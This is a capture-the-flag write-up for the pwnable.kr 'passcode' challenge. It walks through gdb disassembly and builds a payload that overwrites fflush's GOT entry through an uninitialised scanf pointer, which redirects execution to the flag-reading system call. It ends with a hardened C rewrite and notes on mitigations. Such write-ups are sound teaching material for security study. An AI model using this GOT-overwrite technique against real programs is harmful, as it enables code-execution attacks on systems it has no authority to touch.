pwnable.kr: passcode
http://pwnable.kr/playproc.php?no=18
First, a basic understanding of the GOT is needed.
Here is a short introduction to the GOT and the PLT:
https://blog.csdn.net/qq_18661257/article/details/54694748
Run the program under gdb:
gdb ./passcode
# disassemble main
(gdb) disass main
Dump of assembler code for function main:
0x08048665 <+0>: push %ebp
0x08048666 <+1>: mov %esp,%ebp
0x08048668 <+3>: and $0xfffffff0,%esp
0x0804866b <+6>: sub $0x10,%esp
0x0804866e <+9>: movl $0x80487f0,(%esp)
0x08048675 <+16>: call 0x8048450 <puts@plt>
0x0804867a <+21>: call 0x8048609 <welcome> // welcome and login take no arguments
0x0804867f <+26>: call 0x8048564 <login> // the ebp of the two functions is at the same position
0x08048684 <+31>: movl $0x8048818,(%esp)
0x0804868b <+38>: call 0x8048450 <puts@plt>
0x08048690 <+43>: mov $0x0,%eax
0x08048695 <+48>: leave
0x08048696 <+49>: ret
End of assembler dump.
# disassemble welcome and login
(gdb) disass welcome
Dump of assembler code for function welcome:
0x08048609 <+0>: push %ebp
0x0804860a <+1>: mov %esp,%ebp
0x0804860c <+3>: sub $0x88,%esp
0x08048612 <+9>: mov %gs:0x14,%eax
0x08048618 <+15>: mov %eax,-0xc(%ebp)
0x0804861b <+18>: xor %eax,%eax
0x0804861d <+20>: mov $0x80487cb,%eax
0x08048622 <+25>: mov %eax,(%esp)
0x08048625 <+28>: call 0x8048420 <printf@plt>
0x0804862a <+33>: mov $0x80487dd,%eax
0x0804862f <+38>: lea -0x70(%ebp),%edx
0x08048632 <+41>: mov %edx,0x4(%esp)
0x08048636 <+45>: mov %eax,(%esp)
0x08048639 <+48>: call 0x80484a0 <__isoc99_scanf@plt> // read the user name
0x0804863e <+53>: mov $0x80487e3,%eax
0x08048643 <+58>: lea -0x70(%ebp),%edx
0x08048646 <+61>: mov %edx,0x4(%esp)
0x0804864a <+65>: mov %eax,(%esp)
0x0804864d <+68>: call 0x8048420 <printf@plt> // print the user name
0x08048652 <+73>: mov -0xc(%ebp),%eax
0x08048655 <+76>: xor %gs:0x14,%eax
0x0804865c <+83>: je 0x8048663 <welcome+90>
0x0804865e <+85>: call 0x8048440 <__stack_chk_fail@plt>
0x08048663 <+90>: leave
0x08048664 <+91>: ret
End of assembler dump.
(gdb) disass login
Dump of assembler code for function login:
0x08048564 <+0>: push %ebp
0x08048565 <+1>: mov %esp,%ebp
0x08048567 <+3>: sub $0x28,%esp
0x0804856a <+6>: mov $0x8048770,%eax
0x0804856f <+11>: mov %eax,(%esp)
0x08048572 <+14>: call 0x8048420 <printf@plt>
0x08048577 <+19>: mov $0x8048783,%eax
0x0804857c <+24>: mov -0x10(%ebp),%edx // a normal scanf loads its second argument with lea xxx,xxx
0x0804857f <+27>: mov %edx,0x4(%esp) // so the second argument is missing its &, which is what makes the GOT overwrite possible
0x08048583 <+31>: mov %eax,(%esp)
0x08048586 <+34>: call 0x80484a0 <__isoc99_scanf@plt> // read passcode1
0x0804858b <+39>: mov 0x804a02c,%eax
0x08048590 <+44>: mov %eax,(%esp)
0x08048593 <+47>: call 0x8048430 <fflush@plt>
0x08048598 <+52>: mov $0x8048786,%eax
0x0804859d <+57>: mov %eax,(%esp)
0x080485a0 <+60>: call 0x8048420 <printf@plt>
0x080485a5 <+65>: mov $0x8048783,%eax
0x080485aa <+70>: mov -0xc(%ebp),%edx
0x080485ad <+73>: mov %edx,0x4(%esp)
0x080485b1 <+77>: mov %eax,(%esp)
0x080485b4 <+80>: call 0x80484a0 <__isoc99_scanf@plt> // read passcode2
0x080485b9 <+85>: movl $0x8048799,(%esp)
0x080485c0 <+92>: call 0x8048450 <puts@plt>
0x080485c5 <+97>: cmpl $0x528e6,-0x10(%ebp)
0x080485cc <+104>: jne 0x80485f1 <login+141>
0x080485ce <+106>: cmpl $0xcc07c9,-0xc(%ebp)
0x080485d5 <+113>: jne 0x80485f1 <login+141>
0x080485d7 <+115>: movl $0x80487a5,(%esp)
0x080485de <+122>: call 0x8048450 <puts@plt>
0x080485e3 <+127>: movl $0x80487af,(%esp) // this is where the flag gets read; remember this instruction's address, 0x080485e3
0x080485ea <+134>: call 0x8048460 <system@plt>
0x080485ef <+139>: leave
0x080485f0 <+140>: ret
0x080485f1 <+141>: movl $0x80487bd,(%esp)
0x080485f8 <+148>: call 0x8048450 <puts@plt>
0x080485fd <+153>: movl $0x0,(%esp)
0x08048604 <+160>: call 0x8048480 <exit@plt>
End of assembler dump.
We choose to overwrite the GOT entry of fflush, the first function called after the scanf that reads passcode1.
(gdb) x/16i 0x8048430
0x8048430 <fflush@plt>: jmp *0x804a004 // 0x804a004 is the GOT entry of fflush
0x8048436 <fflush@plt+6>: push $0x8
0x804843b <fflush@plt+11>: jmp 0x8048410
0x8048440 <__stack_chk_fail@plt>: jmp *0x804a008
0x8048446 <__stack_chk_fail@plt+6>: push $0x10
0x804844b <__stack_chk_fail@plt+11>: jmp 0x8048410
0x8048450 <puts@plt>: jmp *0x804a00c
0x8048456 <puts@plt+6>: push $0x18
0x804845b <puts@plt+11>: jmp 0x8048410
0x8048460 <system@plt>: jmp *0x804a010
0x8048466 <system@plt+6>: push $0x20
0x804846b <system@plt+11>: jmp 0x8048410
0x8048470 <__gmon_start__@plt>: jmp *0x804a014
0x8048476 <__gmon_start__@plt+6>: push $0x28
0x804847b <__gmon_start__@plt+11>: jmp 0x8048410
0x8048480 <exit@plt>: jmp *0x804a018
(gdb) x/16s 0x8048783
0x8048783: "%d" // the input is read as an int
0x8048786: "enter passcode2 : "
0x8048799: "checking..."
0x80487a5: "Login OK!"
0x80487af: "/bin/cat flag"
0x80487bd: "Login Failed!"
0x80487cb: "enter you name : "
0x80487dd: "%100s"
0x80487e3: "Welcome %s!\n"
0x80487f0: "Toddler's Secure Login System 1.0 beta."
0x8048818: "Now I can safely trust you that you have credential :)"
0x804884f: ""
0x8048850: "\001\033\003;@"
0x8048856: ""
0x8048857: ""
0x8048858: "\a"
From this we can roughly construct our payload:
'A'*(0x70-0x10) + '\x04\xa0\x04\x08' + '134514147\n' // 134514147 is 0x080485e3 converted to a decimal int
Fill the name with 96 A's so that the address of fflush's GOT entry overwrites the value of passcode1; scanf("%d", passcode1) then writes the start address of the system call sequence, 0x080485e3,
into fflush's GOT entry. When the program reaches the fflush call it jumps to 0x080485e3, i.e. to the system call.
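The root cause visible in the disassembly is the missing & (scanf is handed the value of an uninitialised local instead of its address). As an added example, not code from the original writeup or from pwnable.kr, here is the login logic rewritten the way it should have been: scanf/sscanf receives the address of an initialised variable, the return value is checked so malformed input cannot leave a stale value behind, and the comparison is separated from the privileged action. The expected values 338150 and 13371337 are the decimal forms of the 0x528e6 and 0xcc07c9 seen in the cmpl instructions above; the function names are my own. Building the original with gcc -Wall reports the bug as a format warning ("expects argument of type 'int *'"), and linking with -Wl,-z,relro,-z,now (Full RELRO) makes the GOT read-only after startup, so a write to 0x804a004 faults instead of redirecting fflush.

```c
/* Added example (not the challenge's code): hardened version of login(). */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Expected values, taken from the cmpl instructions in the disassembly above. */
#define PASSCODE1_EXPECTED 0x528e6   /* 338150 */
#define PASSCODE2_EXPECTED 0xcc07c9  /* 13371337 */

/* Pure comparison, no side effects: returns 1 on a match, 0 otherwise. */
int check_passcode(int passcode1, int passcode2)
{
    return passcode1 == PASSCODE1_EXPECTED && passcode2 == PASSCODE2_EXPECTED;
}

/* Parse one decimal int from a line of input.
 * Note the &out: the parser is handed the ADDRESS of the caller's variable,
 * so the only memory written is that variable. Returns 1 on success, 0 if the
 * line holds no int, and never leaves *out untouched on success. */
int parse_int(const char *line, int *out)
{
    int value = 0;
    if (line == NULL || sscanf(line, "%d", &value) != 1)
        return 0;
    *out = value;
    return 1;
}

/* Equivalent of the original login() decision, fed two already-read lines.
 * Both locals are initialised, both reads are checked, and a parse failure
 * is a failed login rather than a comparison against stack garbage. */
int login_from_lines(const char *line1, const char *line2)
{
    int passcode1 = 0;
    int passcode2 = 0;
    if (!parse_int(line1, &passcode1))
        return 0;
    if (!parse_int(line2, &passcode2))
        return 0;
    return check_passcode(passcode1, passcode2);
}

/* Interactive driver mirroring the original prompts (fgets bounds the read). */
int main(void)
{
    char line1[32];
    char line2[32];

    printf("enter passcode1 : ");
    fflush(stdout);
    if (!fgets(line1, sizeof line1, stdin))
        return 1;

    printf("enter passcode2 : ");
    fflush(stdout);
    if (!fgets(line2, sizeof line2, stdin))
        return 1;

    puts("checking...");
    if (login_from_lines(line1, line2)) {
        puts("Login OK!");
        /* the privileged action (reading the flag) would go here */
        return 0;
    }
    puts("Login Failed!");
    return 1;
}
```

The payload value from the writeup, 134514147, is harmless here: parse_int stores it into an int that lives in login_from_lines's own frame, so it is simply a wrong passcode rather than a write to 0x804a004.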